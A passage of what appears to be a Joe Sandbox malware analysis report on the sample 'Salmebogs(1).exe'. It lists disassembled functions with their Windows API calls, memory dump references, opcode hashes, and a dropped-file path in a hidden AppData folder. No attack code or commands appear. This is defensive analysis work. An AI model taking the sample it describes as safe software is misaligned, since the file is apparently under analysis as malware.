                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 3f441c19f0f34b91adbe303d8aafc709c018744c962571da53865d23c2bfc605
                                                                        • Instruction ID: 0f445eedd0ead43dce11b02a34d11ee125e6b361330db3d8f0abcaa344057bef
                                                                        • Opcode Fuzzy Hash: 3f441c19f0f34b91adbe303d8aafc709c018744c962571da53865d23c2bfc605
                                                                        • Instruction Fuzzy Hash: 4B116771904118BFEF10AF90DF8CEAE3B79FB54384F10403AF906E10A0D7B48E55AA29
                                                                        Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                        • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                        • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 02abd658966be5e8f0b29f0b4f9cdccbb8b12b4f0ad4caf819e6498e3cbf6354
                                                                        • Instruction ID: 414e13ebf6cb56e84a4404cc700fc4dd46923a21780f0405722d8e14d33058f0
                                                                        • Opcode Fuzzy Hash: 02abd658966be5e8f0b29f0b4f9cdccbb8b12b4f0ad4caf819e6498e3cbf6354
                                                                        • Instruction Fuzzy Hash: 6CF0E172500504AFD701DBE4DE88CEFBBBDEB48311B104466F541F51A1CA749D018B28
                                                                        Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401D59
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                        • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401DD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: dad2da35e6ec8a07650ae4ce35907006cce9f0779c78c460b01871806a789acb
                                                                        • Instruction ID: 8a1e816e8e54b7f29a7d0f5fc6d6dcc0f6bae9f095316fa63564fc8432a1e7a2
                                                                        • Opcode Fuzzy Hash: dad2da35e6ec8a07650ae4ce35907006cce9f0779c78c460b01871806a789acb
                                                                        • Instruction Fuzzy Hash: 5801AD72554641EFEB016BB0AF8ABAA3F74BB65301F104579F681B62E2CA7C10058B2D
                                                                        Function 00404948 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049E9
                                                                        • wsprintfW.USER32 ref: 004049F2
                                                                        • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404A05
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: db785ee730d0a4d628520b2c6d5dc9ea4aae3190b25b70f1a9c81c2a6377a7ed
                                                                        • Instruction ID: 2b7e710ae6fbde1b358b0fd1b9910d87067a2729d46772617da3059f694cf418
                                                                        • Opcode Fuzzy Hash: db785ee730d0a4d628520b2c6d5dc9ea4aae3190b25b70f1a9c81c2a6377a7ed
                                                                        • Instruction Fuzzy Hash: 7E11D8B36041282BDB10A67D9C45E9F3288DB85374F150237FE26F31D6D978D81182E8
                                                                        Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: c52d995c6a09de31d07699e48f6cc19fb67cda0d220f09855fcf85d18e9887f1
                                                                        • Instruction ID: 645ef1fb58c2a3823f89181aa82dd13db394815f37a7e78e367622b5584871de
                                                                        • Opcode Fuzzy Hash: c52d995c6a09de31d07699e48f6cc19fb67cda0d220f09855fcf85d18e9887f1
                                                                        • Instruction Fuzzy Hash: 17219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B88A409B69
                                                                        Function 00402537 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,00000400,?,?,00000021), ref: 00402583
                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,00000400,?,?,00000021), ref: 0040258E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel
                                                                        • API String ID: 3109718747-4235617240
                                                                        • Opcode ID: 7a58e4eb2d75c457ba7f0bbd438a6afcb1cb9f62575a5d40834c74af925970c3
                                                                        • Instruction ID: f33233f6b55fe66688b611574b9ef10b0b9a875e6cfed5cf08d690a2f45472d2
                                                                        • Opcode Fuzzy Hash: 7a58e4eb2d75c457ba7f0bbd438a6afcb1cb9f62575a5d40834c74af925970c3
                                                                        • Instruction Fuzzy Hash: 9211E772A01314BEDB10AFB18F4AA9E3265AF94795F20803BF401F61C1DAFC8A41466E
                                                                        Function 00405EFA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F24
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F45
                                                                        • RegCloseKey.ADVAPI32(?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: : Completed
                                                                        • API String ID: 3677997916-2954849223
                                                                        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                        • Instruction ID: 67c10a838693b4c4a2102f8098a5dbc089b4be67bb217fb13d6fb11fa6bedce4
                                                                        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                        • Instruction Fuzzy Hash: D6015E3210020AEBCF218F25ED08EDB3BACEF44350F00403AF949D2120D735D964CBA9
                                                                        Function 004059E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004059E7
                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004059F1
                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004059E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3936084776
                                                                        • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                        • Instruction ID: 3776da6525f732e5293341d69cc0e540229ccfe12881bb96e40b78ab3c334061
                                                                        • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                        • Instruction Fuzzy Hash: C7D0A771141534AAC221EB469C04CDF639C9F46304341403FF501B30A2C77C5D5187FE
                                                                        Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402D9D
                                                                        • GetTickCount.KERNEL32 ref: 00402DBB
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402DE6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 3ba6df06d1a8a2ebff1cb487cdf72ecd2568b7f3d734aee4a10920d39395f5c6
                                                                        • Instruction ID: ad8085ed609e9a9848802d48f5936c49a501436460537f39ac663ee6903d91f9
                                                                        • Opcode Fuzzy Hash: 3ba6df06d1a8a2ebff1cb487cdf72ecd2568b7f3d734aee4a10920d39395f5c6
                                                                        • Instruction Fuzzy Hash: D2F05831526A21ABC6A16B24FE8CA9B7B64AB84B11711847BF041B11F4DA7C0C92CB9C
                                                                        Function 00403B4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowTextW.USER32(00000000,007A7A20), ref: 00403BE4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$1033
                                                                        • API String ID: 530164218-3818423526
                                                                        • Opcode ID: 4a9363a6df4f188c469d9e85be5717e9923612549b1d7987802fb003682d7455
                                                                        • Instruction ID: 54645776255075cb8615a9bf9b42270142c769617333b00c78cd875754afbab4
                                                                        • Opcode Fuzzy Hash: 4a9363a6df4f188c469d9e85be5717e9923612549b1d7987802fb003682d7455
                                                                        • Instruction Fuzzy Hash: CA11D171B046019BC7249F15DC50A77376DEBC6719718C13BE802A7392DA3DAD028699
                                                                        Function 00405100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0040512F
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405180
                                                                          • Part of subcall function 0040413D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
